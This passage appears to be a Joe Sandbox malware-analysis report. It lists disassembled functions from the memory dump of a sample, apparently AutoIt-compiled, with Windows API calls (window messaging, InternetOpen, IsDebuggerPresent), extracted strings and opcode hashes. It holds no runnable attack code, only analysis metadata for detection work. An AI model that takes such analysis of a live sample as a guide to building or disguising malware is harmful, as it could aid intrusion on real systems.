                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: |
                            • API String ID: 1413715105-2343686810
                            • Opcode ID: 044956fc568e0a5fe97948e8b695df093b7e9ae07265ac8f1128d646f45d6694
                            • Instruction ID: f510da7c2ecf7cb7023276113c44833c65deca9f7385687a5d4af95a9fed1421
                            • Opcode Fuzzy Hash: 044956fc568e0a5fe97948e8b695df093b7e9ae07265ac8f1128d646f45d6694
                            • Instruction Fuzzy Hash: 8531F571900119EBCF11AFA4CC85EEEBBB9FF08350F104059E915B6162EB319956DB70
                            Function 00DC7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DC7B61
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC7B76
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            • API String ID: 3850602802-1997036262
                            • Opcode ID: 07ec1e5283556079cde57e6154a27a74f1921fa7c22d82f69afb4463e98f39a9
                            • Instruction ID: 2a4208c24d45981096ad3fb14c3fbc74c0e7d3353038625b7fd673609d1f7536
                            • Opcode Fuzzy Hash: 07ec1e5283556079cde57e6154a27a74f1921fa7c22d82f69afb4463e98f39a9
                            • Instruction Fuzzy Hash: FE41E775A0520A9FDB14CF65C981FEABBB9FB08300F14416AE908EB391D771A951CFA0
                            Function 00DC6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 00DC6B17
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00DC6B53
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            • API String ID: 2139405536-2160076837
                            • Opcode ID: 7b942e465eab383f6688ac6e173a145f760f75a2a98afcb931e4f5ca5a231926
                            • Instruction ID: 7126c056dd6f44378c2dbe4a33a98e416b60ac502eb25b7a08ee345f48dcc863
                            • Opcode Fuzzy Hash: 7b942e465eab383f6688ac6e173a145f760f75a2a98afcb931e4f5ca5a231926
                            • Instruction Fuzzy Hash: 63316971200605AADB109F68C881FEB77A9FF48760F14861EF9A5D7190DA31EC81CB70
                            Function 00DA28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: ffd330f401e80fec220c3600bf1450d5a04ddf3c3b6e80df915eda35dfc12734
                            • Instruction ID: 381b87ae9925cd296a09eb87b960d5f2b4fb77faff0d2970a58f733dd8fa6f84
                            • Opcode Fuzzy Hash: ffd330f401e80fec220c3600bf1450d5a04ddf3c3b6e80df915eda35dfc12734
                            • Instruction Fuzzy Hash: 7031C1316403059BEB28CF5EC985BBFBBB8EF46750F180429ED85A61A1D7709944CF71
                            Function 00DB39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            • __snwprintf.LIBCMT ref: 00DB3A66
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __snwprintf_memmove
                            • String ID: , $$AUTOITCALLVARIABLE%d
                            • API String ID: 3506404897-2584243854
                            • Opcode ID: d04f0522e554b8755139f4248bf6fd1c9fe8e6196593131c08eff903d9dec161
                            • Instruction ID: b87a7d929c53b1fa871f70594524ea654a45175af2751026aaa1b68edbb448d5
                            • Opcode Fuzzy Hash: d04f0522e554b8755139f4248bf6fd1c9fe8e6196593131c08eff903d9dec161
                            • Instruction Fuzzy Hash: 3F214D31A00219AFCF10EFA4CC82AEE77B9EF44700F614455F556AB282DB30EA45DB71
                            Function 00DC66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DC6761
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC676C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 5e04cd9878e6efc9a33f1db79b0e1e4d05b05ab604881aef30413817b10ca252
                            • Instruction ID: ea67d9c3d37817b1eebebc7d5f0cff6d6d0279c5141833134b2c0f733098aa64
                            • Opcode Fuzzy Hash: 5e04cd9878e6efc9a33f1db79b0e1e4d05b05ab604881aef30413817b10ca252
                            • Instruction Fuzzy Hash: 5211827560020AAFEF119F54CC81FFB376AEB48368F154629F918972D0D671DC5197B0
                            Function 00DC6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D41D35: CreateWindowExW.USER32 ref: 00D41D73
                              • Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
                              • Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91
                            • GetWindowRect.USER32(00000000,?), ref: 00DC6C71
                            • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00DC6C8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            • API String ID: 1983116058-2160076837
                            • Opcode ID: db7db084479b41d674ed28bced9dc27c88275c0dc1794ff636d98a990e6f47bd
                            • Instruction ID: 6e5c7762eaf9d81744bad529900f294eee580eba07657a3fab48e58dccea3d85
                            • Opcode Fuzzy Hash: db7db084479b41d674ed28bced9dc27c88275c0dc1794ff636d98a990e6f47bd
                            • Instruction Fuzzy Hash: EC21567262020AAFDF04DFA8CD45EEA7BA9FB08314F044629F995E3250D735E861DB60
                            Function 00DC6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00DC69A2
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DC69B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: 7b5ec9da69bc919b2e6be9c7bb50c32cf3304a8ac746fd894c1ab29c19fc56a3
                            • Instruction ID: 892ad2131704dc3e2f859e6366b820d99c4bea7d28880b617b1d9122288ad90b
                            • Opcode Fuzzy Hash: 7b5ec9da69bc919b2e6be9c7bb50c32cf3304a8ac746fd894c1ab29c19fc56a3
                            • Instruction Fuzzy Hash: AA115B7151020AABEB108F64DC41FEB366AEB05374F544728FAA5971E0CB31DC919B70
                            Function 00DA29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: a10cbf7f238b1c8ee6fe2f3fd7f0e4d6f329d902416851901f76c9921df99d62
                            • Instruction ID: a801344ea42a8315f75e93f3e1d30891e015b4fa15693cea459a350e8c9a3cb3
                            • Opcode Fuzzy Hash: a10cbf7f238b1c8ee6fe2f3fd7f0e4d6f329d902416851901f76c9921df99d62
                            • Instruction Fuzzy Hash: 86119032A05214ABDF34DB9ED844BBA77B8EB86310F184021E955E7290D770ED0ACBB1
                            Function 00DB21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DB222C
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DB2255
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            • API String ID: 942729171-4266983199
                            • Opcode ID: f8df9921c478629b8e1d5a57e786101d797b45bd54e5f7488b8a719b882719f8
                            • Instruction ID: 23421ef8f1992e559ec909747a51e0ffd2ea7011063ab28b9e896073eec77244
                            • Opcode Fuzzy Hash: f8df9921c478629b8e1d5a57e786101d797b45bd54e5f7488b8a719b882719f8
                            • Instruction Fuzzy Hash: 76110272501226FEDB248F118C84EFBFBA8FF06351F10862AF946D6140D3709990D6F0
                            Function 00D5092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43C14,00E052F8,?,?,?), ref: 00D5096E
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • _wcscat.LIBCMT ref: 00D84CB7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat
                            • String ID: S
                            • API String ID: 257928180-3334745618
                            • Opcode ID: c4b9e6b2d1360f261671f9555f4846c3e120ac80e1890d4aeba5ef4ec187ac01
                            • Instruction ID: 30d48a73a0cee0f1c6dfb44d31efc46e7ff679907c3be41e39d5cfde3cc9be58
                            • Opcode Fuzzy Hash: c4b9e6b2d1360f261671f9555f4846c3e120ac80e1890d4aeba5ef4ec187ac01
                            • Instruction Fuzzy Hash: 451152359056099BCF41EBA48806EDA7BA8FF08351B0445A5BD89D7289EB7496888F31
                            Function 00D98E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D98E73
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 1476acd85a66238123e6322e33259f7c2bc7a44a1b5d250e05d94eee73673903
                            • Instruction ID: 8b65538470e37caa14184f89b09cbe49fcca023c82065b64f081fd2b97483983
                            • Opcode Fuzzy Hash: 1476acd85a66238123e6322e33259f7c2bc7a44a1b5d250e05d94eee73673903
                            • Instruction Fuzzy Hash: 0901F171A01219AB8F14EBA4CC518FE7369EF06320B040A19F872573E2DF325808D670
                            Function 00D98CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D98D6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 1232b1ee8db162cff94664ac5d4cb30387581fca1235eb1d13ecfe08217ee334
                            • Instruction ID: d05f3bd58c377f8557092555e096d38b998bc6689bd2e97019267b1bd6504d5c
                            • Opcode Fuzzy Hash: 1232b1ee8db162cff94664ac5d4cb30387581fca1235eb1d13ecfe08217ee334
                            • Instruction Fuzzy Hash: EE01F2B1A41109AFDF14EBE0C952EFE73A8DF16740F140019B802632E2DF249E0CE6B1
                            Function 00D98D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D98DEE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: c731eadc0737d19c26278cb7bbf21135909028d333f37bbe070ea556a1be7a4b
                            • Instruction ID: a1ed98d516d917e05e910fb3bce740fe08a4f6a822b05b3f4ae496be0a273a6b
                            • Opcode Fuzzy Hash: c731eadc0737d19c26278cb7bbf21135909028d333f37bbe070ea556a1be7a4b
                            • Instruction Fuzzy Hash: 5901F271B41109ABDF10EBA4C942EFE77A8CF16740F144015B801A3292DE258E08E6B1
                            Function 00D66B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: @B
                            • API String ID: 3494438863-3690976569
                            • Opcode ID: 6c48b6e13d21a36d082624bbf59783eabc67ab84ba12279abfb1e81166b7570f
                            • Instruction ID: d5b77ae83e54c9e1480d2bf159726f828d8267a9e5e8d6c3efa10d767aa7e92a
                            • Opcode Fuzzy Hash: 6c48b6e13d21a36d082624bbf59783eabc67ab84ba12279abfb1e81166b7570f
                            • Instruction Fuzzy Hash: F6F04472204616DFEB649F5EBC51B7327A5EB00730B54051AE600DE1A0EB71C8898EF4
                            Function 00DA4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: ec86ddfd1d23eaecb1fd89b8921ee41f496b314f8906d25401c7d94212b8017a
                            • Instruction ID: 6114cd2c758b17e68dc0407df1414842bc4bae644980c69ef87d0c21639fbb63
                            • Opcode Fuzzy Hash: ec86ddfd1d23eaecb1fd89b8921ee41f496b314f8906d25401c7d94212b8017a
                            • Instruction Fuzzy Hash: 27E09232A042292BD7209B99AC49FA7FBACEB85B71F010066FD04D7151DA609A598BF1
                            Function 00D7B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D7B314: _memset.LIBCMT ref: 00D7B321
                              • Part of subcall function 00D60940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D7B2F0,?,?,?,00D4100A), ref: 00D60945
                            • IsDebuggerPresent.KERNEL32(?,?,?,00D4100A), ref: 00D7B2F4
                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D4100A), ref: 00D7B303
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7B2FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 3158253471-631824599
                            • Opcode ID: b8bdff2860ceaf3d21e4a60b7617b58a2eb3abe7e1b0399bdffbb715272d6ee6
                            • Instruction ID: bbd047c86e610c0e07ab2ec8fe9f6811d928c2a390fc37c7da17b40f877b5512
                            • Opcode Fuzzy Hash: b8bdff2860ceaf3d21e4a60b7617b58a2eb3abe7e1b0399bdffbb715272d6ee6
                            • Instruction Fuzzy Hash: 77E06D70200B528FD720AF29E4047427AE8EF00714F04892EE48AC7350EBB4D488CBB1
                            Function 00D81935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D81775
                              • Part of subcall function 00DBBFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00DBBFFE
                              • Part of subcall function 00DBBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00D8195E,?), ref: 00DBC010
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D8196D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                            • String ID: WIN_XPe
                            • API String ID: 582185067-3257408948
                            • Opcode ID: 30facede1f56295a861aefd90ab5419ffd2f1f6240b6072025a4b0f50fdeed91
